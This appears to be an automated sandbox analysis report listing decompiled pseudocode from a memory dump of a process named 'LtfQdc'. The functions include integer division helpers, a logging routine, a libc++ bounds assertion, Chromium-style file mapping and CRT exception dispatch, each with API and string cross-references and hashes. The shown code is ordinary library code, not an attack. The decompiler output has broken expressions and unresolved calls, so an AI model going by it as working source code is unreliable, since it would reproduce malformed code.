0x00ced95b
0x00ced961
0x00ced966
0x00ced96e
0x00ced97f
0x00ced981
0x00ced996
0x00ced99b
0x00ced99f
0x00ced9a3
0x00ced9a3
0x00ceda41
0x00ceda47
0x00ceda49
0x00ceda4f
0x00ceda65
0x00ceda68
0x00ceda75
0x00ceda79
0x00ceda82
0x00ceda84
0x00ceda8e
0x00ceda92
0x00cedaa5
0x00cedaa9
0x00cedaaa
0x00cedaac
0x00cedabe
0x00cedac3
0x00cedac6
0x00cedac8
0x00cedad2
0x00cedad6
0x00cedae9
0x00cedaed
0x00cedaee
0x00cedaf0
0x00cedb02
0x00cedb07
0x00cedb0a
0x00cedb0c
0x00cedb16
0x00cedb1a
0x00cedb2d
0x00cedb31
0x00cedb32
0x00cedb34
0x00cedb3b
0x00cedb3e
0x00cedb43
0x00cedb45
0x00000000
0x00cedb45

APIs

__aulldiv.LIBCMT ref: 00CED981
__aullrem.LIBCMT ref: 00CED996
__aulldiv.LIBCMT ref: 00CEDA10
__aullrem.LIBCMT ref: 00CEDA1E
__aulldiv.LIBCMT ref: 00CEDA60
__aulldiv.LIBCMT ref: 00CEDA7D
__aullrem.LIBCMT ref: 00CEDABE
__aullrem.LIBCMT ref: 00CEDB02

Part of subcall function 00CEDD30: __aullrem.LIBCMT ref: 00CEDD4E
Part of subcall function 00CEDD30: __aulldiv.LIBCMT ref: 00CEDD61
Part of subcall function 00CEDD30: __aullrem.LIBCMT ref: 00CEDD71
Part of subcall function 00CEDD30: __aulldiv.LIBCMT ref: 00CEDD86

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID:
API String ID: 3839614884-0
Opcode ID: d3e785dec80c54756de7d94bf5ce28f894c9e4f84d68688da41dbf186ce290c3
Instruction ID: 05750c43496a6552e7aaa721522c827f41743071618ec44631d97f502834a6eb
Opcode Fuzzy Hash: d3e785dec80c54756de7d94bf5ce28f894c9e4f84d68688da41dbf186ce290c3
Instruction Fuzzy Hash: CAC1CE72B0025A9FCB14CE6DC891BAFB7E6EFC9350F254128E956E7381D6749C01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C981C8 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00C981C8(signed int __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				void* _v16;
				signed int _v24;
				char _v536;
				char _v560;
				char _v592;
				char _v608;
				char _v640;
				intOrPtr* _v644;
				intOrPtr* _v648;
				intOrPtr _v664;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int* _t40;
				void* _t41;
				void* _t42;
				void* _t45;
				signed int _t52;
				void* _t59;
				void* _t60;
				intOrPtr* _t63;
				intOrPtr _t66;
				intOrPtr* _t70;
				signed int _t75;
				void* _t87;
				char* _t89;
				intOrPtr* _t90;
				intOrPtr _t91;
				signed int _t92;
				signed int _t93;
				void* _t96;
				void* _t97;
				void* _t113;

				_t113 = __fp0;
				_t80 = __edx;
				_t37 =  *0xd40014; // 0xfbddd969
				_v24 = _t37 ^ _t92;
				_t90 =  &_v536;
				E00D011A0(_t87, _t90, 0xff, 0x200);
				_t96 = (_t93 & 0xfffffff0) - 0x280 + 0xc;
				_t88 = 0x200;
				_v644 = 0;
				while(1) {
					_v640 =  &_a20;
					_t40 = L00C93E0B();
					_v648 = _t90;
					_t41 = E00D02288(_t80, _t88,  *_t40 | 0x00000002, _t40[1], _t90, _t88, _a16, 0,  &_a20);
					_t97 = _t96 + 0x1c;
					_t42 =  <  ? 0xffffffff : _t41;
					if(_t42 < 0) {
						break;
					}
					_t66 = _v644;
					if(_t88 <= 0x1ffff && _t42 >= _t88) {
						_t88 = _t88 << 2;
						_push(_t88);
						_t63 = L00CFDC23();
						_t96 = _t97 + 4;
						_t90 = _t63;
						if(_t66 != 0) {
							L00CFDC2C(_t66);
							_t96 = _t96 + 4;
						}
						_v644 = _t90;
						continue;
					}
					L8:
					_t70 =  *0xd45d7c; // 0x0
					if(_t70 == 0) {
						asm("pcmpeqd xmm0, xmm0");
						_t89 =  &_v560;
						asm("movdqa [edi], xmm0");
						E00C983C2(_t80, _t89, 0xd307ff, _a12);
						_t91 = _a8;
						_t45 = E00D131A0(_t91);
						_t47 =  <  ? 0 : _t45 - 0x16;
						_t48 = ( <  ? 0 : _t45 - 0x16) + _t91;
						asm("pcmpeqd xmm0, xmm0");
						asm("movdqu [edx+0xc], xmm0");
						asm("movdqa [edx], xmm0");
						_push(_t89);
						_push(( <  ? 0 : _t45 - 0x16) + _t91);
						E00C98436( &_v592,  &_v592, "%*s:%s", 0x16 -  *((intOrPtr*)(_t89 + 0xc)));
						_t90 =  &_v640;
						E00C98520(_t113, _t90);
						_t52 = L00D1BF10( *_t90,  *((intOrPtr*)(_t90 + 4)), 0xf4240, 0);
						_t88 = _t52;
						_t75 = _t52 * 0x10624dd3 >> 0x20 >> 6;
						_t80 = (_t75 * 0x10624dd3 >> 0x20 >> 6) * 0x3e8;
						asm("pcmpeqd xmm0, xmm0");
						asm("movdqa [esi+0x10], xmm0");
						asm("movdqa [esi], xmm0");
						 *((intOrPtr*)(_t90 + 0x20)) = 0xffffffff;
						_push(_t75 * 0xfffffc18 + _t52);
						E00C984AA((_t75 * 0x10624dd3 >> 0x20 >> 6) * 0x3e8, _t90, "[%03u.%03u] ", _t75 - 0x10624dd3);
						_t59 = L00D01EEF(2);
						_push(_v664);
						_push( &_v608);
						_t60 = L00C96D00( &_v608, _t59, "%s%s %s\n", _t90);
					} else {
						 *0xd57000();
						_t60 =  *_t70(_a4, _a12, _a8, _v648);
					}
					if(_t66 != 0) {
						_t60 = L00CFDC2C(_t66);
					}
					return E00CFE643(_t60, _t66, _v24 ^ _t92, _t80, _t88, _t90);
				}
				E00C955D8(_t80, _v648, _t88, "%s", "[printf format error]");
				_t97 = _t97 + 0x10;
				_t66 = _v644;
				goto L8;
			}

0x00c981c8
0x00c981c8
0x00c981d7
0x00c981de
0x00c981e5
0x00c981f4
0x00c981f9
0x00c981fc
0x00c98201
0x00c98209
0x00c9820c
0x00c98210
0x00c98221
0x00c9822a
0x00c9822f
0x00c98239
0x00c9823e
0x00000000
0x00000000
0x00c98246
0x00c9824a
0x00c98250
0x00c98253
0x00c98254
0x00c98259
0x00c9825c
0x00c98260
0x00c98263
0x00c98268
0x00c98268
0x00c9826b
0x00000000
0x00c9826b
0x00c9828c
0x00c9828c
0x00c98294
0x00c982b3
0x00c982b7
0x00c982bb
0x00c982c8
0x00c982d0
0x00c982d4
0x00c982e8
0x00c982eb
0x00c982f1
0x00c982f5
0x00c982fa
0x00c982fe
0x00c982ff
0x00c98307
0x00c9830f
0x00c98314
0x00c98329
0x00c9832e
0x00c98339
0x00c98350
0x00c98358
0x00c9835c
0x00c98361
0x00c98365
0x00c9836c
0x00c98374
0x00c9837e
0x00c98386
0x00c9838e
0x00c98396
0x00c98296
0x00c98296
0x00c982a9
0x00c982ab
0x00c983a0
0x00c983a3
0x00c983a8
0x00c983c0
0x00c983c0
0x00c98280
0x00c98285
0x00c98288
0x00000000

APIs

_strlen.LIBCMT ref: 00C982D4
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C98329

Strings

[%03u.%03u] , xrefs: 00C9836E
[printf format error], xrefs: 00C98271
%s%s %s, xrefs: 00C98390
%*s:%s, xrefs: 00C98301

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
String ID: %*s:%s$%s%s %s$[%03u.%03u] $[printf format error]
API String ID: 2172594012-3351823563
Opcode ID: 63a4ac1c49165c44891eca33a4ec43c43430c34e3f834f2c1e16e44e2f2f274d
Instruction ID: 156531bfbe26eb95deff103a302b24243480636cbca2fcf76fe570021ce6f574
Opcode Fuzzy Hash: 63a4ac1c49165c44891eca33a4ec43c43430c34e3f834f2c1e16e44e2f2f274d
Instruction Fuzzy Hash: 06516CB2E007416FEB149F20CC46E6BBB69EFC6310F04462CF95957192EF71D5188BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CE98B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00CE98B0(void* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v52;
				signed int _t63;
				signed int _t68;
				void* _t70;
				void* _t77;
				intOrPtr _t83;
				signed int _t84;
				intOrPtr _t85;
				signed int _t88;
				signed char _t100;
				unsigned int _t101;
				signed int _t108;
				void* _t115;
				intOrPtr _t117;
				intOrPtr _t118;
				signed int _t121;
				void* _t132;

				_t132 = __fp0;
				_t77 = __edx;
				_v24 = __ecx;
				_t117 =  *((intOrPtr*)(__edx + 0x1000)) + 0x40;
				__imp__TryAcquireSRWLockExclusive(_t117, _t115, __edi, __ebx);
				if(__eax == 0) {
					L00CC8B90(__eax, _t117);
				}
				_t108 =  *(_t77 + 0x100a) & 0x0000ffff;
				_t88 = 0;
				_v32 = _t117;
				if(_t108 == 0) {
					L4:
					_t118 = _v24;
					 *(_t118 + 0x5b8) = _t88;
					__imp__ReleaseSRWLockExclusive(_v32);
					return _t118;
				} else {
					_t121 = (_t77 + 0x00014000 >> 0x00000009 & 0x00000fe0) + (_t77 + 0x00014000 & 0xffe00000) + 0x1000;
					_t83 = (_t77 + 0x001f8000 >> 0x00000009 & 0x00000fe0) + (_t77 + 0x001f8000 & 0xffe00000) + 0x1000;
					if(_t121 <= _t83) {
						_t88 = 0;
						_v20 = _t83;
						do {
							_t100 =  *(_t121 + 0x1e) & 0x000000ff;
							if((_t100 & 0x00000040) == 0) {
								_t63 = 1;
								if(_t100 >= 0) {
									goto L4;
								} else {
									goto L7;
								}
							} else {
								_t84 =  *(_t121 + 0xc);
								if((_t84 & 0x00003ffe) == 0) {
									_t83 = _v20;
									goto L15;
								} else {
									_v36 = _t108;
									_v28 = _t88;
									if((_t84 & 0x08000000) != 0) {
										_t101 =  *(_t121 + 0x20);
										if(_t88 < 0x7a) {
											goto L12;
										} else {
											goto L17;
										}
									} else {
										_t114 =  *((intOrPtr*)(_t121 + 8));
										_t88 = _v28;
										_t101 = ((((( *( *((intOrPtr*)(_t121 + 8)) + 0x10) & 0x000000ff) << 0xc) *  *( *((intOrPtr*)(_t121 + 8)) + 0x18) >> 0x20) +  *(_t114 + 0x1c) * (( *( *((intOrPtr*)(_t121 + 8)) + 0x10) & 0x000000ff) << 0xc) >> 0xa) - _t84) *  *(_t114 + 0xc);
										if(_t88 >= 0x7a) {
											L17:
											_push("out-of-bounds access in std::array<T, N>");
											_push("__n < _Size");
											_push(0xda);
											_push("..\\..\\buildtools\\third_party\\libc++\\trunk\\include\\array");
											L00C96D4C(_t84, _t88, _t101, _t132, "%s:%d: assertion %s failed: %s");
											asm("int3");
											asm("int3");
											_push(_t121);
											_t70 = L00CE5BB0( *((intOrPtr*)(_t88 + 4)), _v52);
											 *((intOrPtr*)(_t88 + 0xc)) =  *((intOrPtr*)(_t88 + 0xc)) + _t70;
											return _t70;
										} else {
											L12:
											_t68 = _t88 + _t88 * 2;
											_t85 = _v24;
											 *(_t85 + _t68 * 4) = _t121 << 0x00000007 & 0x0007f000;
											 *(_t85 + 4 + _t68 * 4) = _t101 >> 2;
											 *(_t85 + 8 + _t68 * 4) =  *( *((intOrPtr*)(_t121 + 8)) + 0xc) >> 2;
											_t88 = _v28 + 1;
											_t108 = _v36 - 1;
											_t83 = _v20;
											if(_t108 != 0) {
												L15:
												_t63 = ( *( *((intOrPtr*)(_t121 + 8)) + 0x10) & 0x000000ff) + 3 >> 2;
												goto L7;
											} else {
												goto L4;
											}
										}
									}
								}
							}
							goto L19;
							L7:
							_t121 = _t121 + (_t63 << 5);
						} while (_t121 <= _t83);
					}
					goto L4;
				}
				L19:
			}

0x00ce98b0
0x00ce98b9
0x00ce98bb
0x00ce98c4
0x00ce98c8
0x00ce98d0
0x00ce98d4
0x00ce98d4
0x00ce98d9
0x00ce98e0
0x00ce98e4
0x00ce98e7
0x00ce992a
0x00ce992a
0x00ce992d
0x00ce9936
0x00ce9945
0x00ce98e9
0x00ce9902
0x00ce9920
0x00ce9928
0x00ce9946
0x00ce9948
0x00ce9962
0x00ce9962
0x00ce9969
0x00ce9950
0x00ce9957
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce996b
0x00ce996b
0x00ce9974
0x00ce99f3
0x00000000
0x00ce9976
0x00ce9976
0x00ce997f
0x00ce9982
0x00ce9a08
0x00ce9a0e
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce9988
0x00ce9988
0x00ce999f
0x00ce99b0
0x00ce99b7
0x00ce9a10
0x00ce9a10
0x00ce9a15
0x00ce9a1a
0x00ce9a1f
0x00ce9a29
0x00ce9a2e
0x00ce9a2f
0x00ce9a33
0x00ce9a3c
0x00ce9a41
0x00ce9a46
0x00ce99b9
0x00ce99b9
0x00ce99b9
0x00ce99cd
0x00ce99d0
0x00ce99d9
0x00ce99e0
0x00ce99e4
0x00ce99e8
0x00ce99e9
0x00ce99ec
0x00ce99f6
0x00ce9a00
0x00000000
0x00ce99ee
0x00000000
0x00ce99ee
0x00ce99ec
0x00ce99b7
0x00ce9982
0x00ce9974
0x00000000
0x00ce9959
0x00ce995c
0x00ce995e
0x00ce9962
0x00000000
0x00ce9928
0x00000000

APIs

TryAcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?), ref: 00CE98C8
ReleaseSRWLockExclusive.KERNEL32(?,?,?,00000000,?), ref: 00CE9936

Part of subcall function 00CC8B90: TryAcquireSRWLockExclusive.KERNEL32(00D54B90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CC8BAC
Part of subcall function 00CC8B90: AcquireSRWLockExclusive.KERNEL32(00D54B90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CC8BDD

Strings

%s:%d: assertion %s failed: %s, xrefs: 00CE9A24
..\..\buildtools\third_party\libc++\trunk\include\array, xrefs: 00CE9A1F
out-of-bounds access in std::array<T, N>, xrefs: 00CE9A10
__n < _Size, xrefs: 00CE9A15

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$Acquire$Release
String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\array$__n < _Size$out-of-bounds access in std::array<T, N>
API String ID: 1678258262-2736795775
Opcode ID: abed548f4ab8334ccb33c9c746c210ffe3acfb5b77c1d7bafdf2428aad7797fb
Instruction ID: 3cad77f96d68e52a070fef0fd72d4eedfb7ba8ae2d34019ce96e4c6a6e99121b
Opcode Fuzzy Hash: abed548f4ab8334ccb33c9c746c210ffe3acfb5b77c1d7bafdf2428aad7797fb
Instruction Fuzzy Hash: 004125B2A006158BCB148F4AD8D27AAB7B1FF44300F05453DE9A9AB786C774AD41C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00CCA940 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120
fileCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00CCA940(void* __ecx, intOrPtr __edx, void* __eflags, void* __fp0) {
				void* _v16;
				signed int _v24;
				char _v96;
				unsigned int _v108;
				unsigned int _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				intOrPtr _t32;
				unsigned int _t33;
				unsigned int _t36;
				unsigned int _t40;
				void* _t53;
				char _t54;
				long _t55;
				unsigned int _t66;
				intOrPtr _t69;
				signed int _t71;
				void* _t73;
				signed int _t74;
				signed int _t75;
				unsigned int _t77;
				void* _t78;
				intOrPtr* _t80;
				unsigned int* _t81;
				void* _t82;

				_t90 = __fp0;
				_t82 = __eflags;
				_t69 = __edx;
				_t77 = (_t75 & 0xfffffff0) - 0x60;
				_t73 = __ecx;
				_t24 =  *0xd40014; // 0xfbddd969
				_v24 = _t24 ^ _t74;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x40], xmm0");
				asm("movdqa [esp+0x30], xmm0");
				asm("movdqa [esp+0x20], xmm0");
				asm("movdqa [esp+0x10], xmm0");
				_t72 = _t77;
				L00CC4C80(_t77, "MapImageToMemory", "..\\..\\base\\files\\memory_mapped_file_win.cc", 0x1b);
				_t78 = _t77 + 0x10;
				L00CC9DD0(_t53,  &_v96, _t69, _t82, __fp0, _t77, 0);
				if(E00CC07B0(_t73) == 0) {
					L8:
					_t54 = 0;
					L9:
					E00CFE643(L00CC9E30( &_v96, _t69, _t90), _t54, _v24 ^ _t74, _t69, _t72, _t73);
					return _t54;
				}
				_t32 = E00CC07C0(_t73);
				_t80 = _t78 - 0x18;
				asm("movdqa xmm0, [0xd35f30]");
				asm("movdqu [esp+0x4], xmm0");
				 *_t80 = _t32;
				_v116 = 0;
				_t33 = CreateFileMappingW(??, ??, ??, ??, ??, ??);
				_t72 = _t33;
				if( *(_t73 + 0x24) != _t33) {
					_t55 = GetLastError();
					if( *(_t73 + 0x24) + 1 >= 2) {
						L00CC4CB0();
						L00CC4CC0( *(_t73 + 0x24));
						_t80 = _t80 + 4;
						 *(_t73 + 0x24) = 0;
					}
					if(_t72 + 1 >= 2) {
						 *(_t73 + 0x24) = _t72;
						L00CC4CB0();
					}
					SetLastError(_t55);
					_t72 =  *(_t73 + 0x24);
				}
				_t10 = _t72 + 1; // 0x1
				if(_t10 >= 2) {
					_t81 = _t80 - 0x14;
					asm("movdqa xmm0, [0xd35f40]");
					asm("movdqu [esp+0x4], xmm0");
					 *_t81 = _t72;
					_t72 = MapViewOfFile(??, ??, ??, ??, ??);
					_t36 =  *(_t73 + 0x1c);
					_t71 = _t36 >> 0x13;
					__eflags = _t71;
					_t69 =  *((intOrPtr*)(0xd48a6c + _t71 * 4));
					asm("bt edx, ecx");
					if(_t71 < 0) {
						_push(_t36);
						L00CBEA30(_t36, _t90);
						_t81 =  &(_t81[1]);
					}
					_t66 = _t72 >> 0x13;
					__eflags = _t66;
					asm("bt ecx, eax");
					if(_t66 >= 0) {
						_t40 = _t72 >> 0x15;
						__eflags = _t40;
						 *((char*)(_t40 + 0xd50a6c)) = 1;
					} else {
						_push(_t72);
						L00CBE930();
						_t81 =  &(_t81[1]);
					}
					 *(_t73 + 0x1c) = _t72;
					__eflags = _t72;
					if(_t72 == 0) {
						goto L8;
					}
					 *_t81 = 0xd2f29c;
					_v108 = _t72;
					 *((intOrPtr*)(_t73 + 0x20)) =  *((intOrPtr*)(L00CDDD8C(_t81) + 0x50));
					_t54 = 1;
					goto L9;
				} else {
					goto L8;
				}
			}

0x00cca940
0x00cca940
0x00cca940
0x00cca949
0x00cca94c
0x00cca94e
0x00cca955
0x00cca959
0x00cca95d
0x00cca963
0x00cca969
0x00cca96f
0x00cca975
0x00cca984
0x00cca989
0x00cca993
0x00cca9a1
0x00ccaa1d
0x00ccaa1d
0x00ccaa1f
0x00ccaa2e
0x00ccaa3c
0x00ccaa3c
0x00cca9a5
0x00cca9aa
0x00cca9ad
0x00cca9b5
0x00cca9bb
0x00cca9be
0x00cca9c6
0x00cca9cc
0x00cca9d1
0x00cca9d9
0x00cca9e2
0x00cca9e4
0x00cca9ec
0x00cca9f1
0x00cca9f4
0x00cca9f4
0x00ccaa01
0x00ccaa03
0x00ccaa06
0x00ccaa06
0x00ccaa0c
0x00ccaa12
0x00ccaa12
0x00ccaa15
0x00ccaa1b
0x00ccaa3f
0x00ccaa42
0x00ccaa4a
0x00ccaa50
0x00ccaa59
0x00ccaa5b
0x00ccaa65
0x00ccaa65
0x00ccaa68
0x00ccaa6f
0x00ccaa72
0x00ccaa74
0x00ccaa75
0x00ccaa7a
0x00ccaa7a
0x00ccaa84
0x00ccaa84
0x00ccaa8e
0x00ccaa91
0x00ccaaa0
0x00ccaaa0
0x00ccaaa3
0x00ccaa93
0x00ccaa93
0x00ccaa94
0x00ccaa99
0x00ccaa99
0x00ccaaaa
0x00ccaaad
0x00ccaaaf
0x00000000
0x00000000
0x00ccaab5
0x00ccaabc
0x00ccaaca
0x00ccaacd
0x00000000
0x00000000
0x00000000
0x00000000

APIs

CreateFileMappingW.KERNEL32 ref: 00CCA9C6
GetLastError.KERNEL32 ref: 00CCA9D3
SetLastError.KERNEL32(00000000), ref: 00CCAA0C

Part of subcall function 00CC4CC0: GetHandleVerifier.LTFQDC(00000000,00000000,?,?,00CC0CB8,?), ref: 00CC4CC9

MapViewOfFile.KERNEL32 ref: 00CCAA53

Strings

MapImageToMemory, xrefs: 00CCA97E
..\..\base\files\memory_mapped_file_win.cc, xrefs: 00CCA979

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ErrorFileLast$CreateHandleMappingVerifierView
String ID: ..\..\base\files\memory_mapped_file_win.cc$MapImageToMemory
API String ID: 1014098455-1911252035
Opcode ID: c829e86d278cd390c410888675d4483975b02a47f48a2fb8ee0d05ce157f8e10
Instruction ID: 699d78f065997f216e854e7dc825202105aa571c228a1b210185c3ec29182567
Opcode Fuzzy Hash: c829e86d278cd390c410888675d4483975b02a47f48a2fb8ee0d05ce157f8e10
Instruction Fuzzy Hash: 5341E171A047448BC310AF28D94AB2EB7E1AFC9714F000A2DF9C7D7341EB70A945DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00CFFAB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00CFFAB0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t53;
				signed int _t60;
				intOrPtr _t61;
				void* _t62;
				intOrPtr* _t63;
				intOrPtr _t65;
				intOrPtr* _t68;
				intOrPtr* _t76;
				intOrPtr* _t80;
				intOrPtr _t81;
				signed int _t85;
				char _t87;
				intOrPtr* _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr* _t102;
				intOrPtr* _t103;
				intOrPtr* _t104;
				void* _t108;
				void* _t110;
				void* _t117;

				_t93 = __edx;
				_push(__ebx);
				_t80 = _a4;
				_push(__esi);
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t80 = L00D23DA5(__ecx,  *_t80);
				_t81 = _a8;
				_t6 = _t81 + 0x10; // 0x11
				_t100 = _t6;
				_push(_t100);
				_v20 = _t100;
				_v12 =  *(_t81 + 8) ^  *0xd40014;
				L00CFFA70(_t81, __edx, __edi, _t100,  *(_t81 + 8) ^  *0xd40014);
				L00D14B7C(_a12);
				_t53 = _a4;
				_t110 = _t108 - 0x1c + 0x10;
				_t97 =  *((intOrPtr*)(_t81 + 0xc));
				if(( *(_t53 + 4) & 0x00000066) != 0) {
					__eflags = _t97 - 0xfffffffe;
					if(_t97 != 0xfffffffe) {
						_t93 = 0xfffffffe;
						L00D14F60(_t81, 0xfffffffe, _t100, 0xd40014);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t53;
					_v28 = _a12;
					 *((intOrPtr*)(_t81 - 4)) =  &_v32;
					if(_t97 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t85 = _v12;
							_t60 = _t97 + (_t97 + 2) * 2;
							_t81 =  *((intOrPtr*)(_t85 + _t60 * 4));
							_t61 = _t85 + _t60 * 4;
							_t86 =  *((intOrPtr*)(_t61 + 4));
							_v24 = _t61;
							if( *((intOrPtr*)(_t61 + 4)) == 0) {
								_t87 = _v5;
								goto L7;
							} else {
								_t93 = _t100;
								_t62 = L00D14F00(_t86, _t100);
								_t87 = 1;
								_v5 = 1;
								_t117 = _t62;
								if(_t117 < 0) {
									_v16 = 0;
									L13:
									_push(_t100);
									L00CFFA70(_t81, _t93, _t97, _t100, _v12);
									goto L14;
								} else {
									if(_t117 > 0) {
										_t63 = _a4;
										__eflags =  *_t63 - 0xe06d7363;
										if( *_t63 == 0xe06d7363) {
											__eflags =  *0xd26240;
											if(__eflags != 0) {
												_t76 = L00D14D50(__eflags, 0xd26240);
												_t110 = _t110 + 4;
												__eflags = _t76;
												if(_t76 != 0) {
													_t104 =  *0xd26240; // 0xcff3d0
													 *0xd57000(_a4, 1);
													 *_t104();
													_t100 = _v20;
													_t110 = _t110 + 8;
												}
												_t63 = _a4;
											}
										}
										_t94 = _t63;
										L00D14F40(_t63, _a8, _t63);
										_t65 = _a8;
										__eflags =  *((intOrPtr*)(_t65 + 0xc)) - _t97;
										if( *((intOrPtr*)(_t65 + 0xc)) != _t97) {
											_t94 = _t97;
											L00D14F60(_t65, _t97, _t100, 0xd40014);
											_t65 = _a8;
										}
										_push(_t100);
										 *((intOrPtr*)(_t65 + 0xc)) = _t81;
										L00CFFA70(_t81, _t94, _t97, _t100, _v12);
										_t95 = _t100;
										_t90 =  *((intOrPtr*)(_v24 + 8));
										L00D14F20();
										asm("int3");
										_push(_t100);
										_t102 =  *((intOrPtr*)(L00D13D51(_t81, _t90, _t95, _t97, _t100) + 4));
										__eflags = _t102;
										if(__eflags != 0) {
											_t90 = _t102;
											 *0xd57000();
											 *_t102();
										}
										_t68 = E00D0D639(_t81, _t90, _t95, _t97, _t102, __eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t102);
										L28();
										_t103 = _t68;
										__eflags = _t103;
										if(_t103 != 0) {
											_t90 = _t103;
											 *0xd57000();
											 *_t103();
										}
										E00D0E930(_t81, _t90, _t95, _t97, _t103);
										asm("int3");
										return  *0xd445e0;
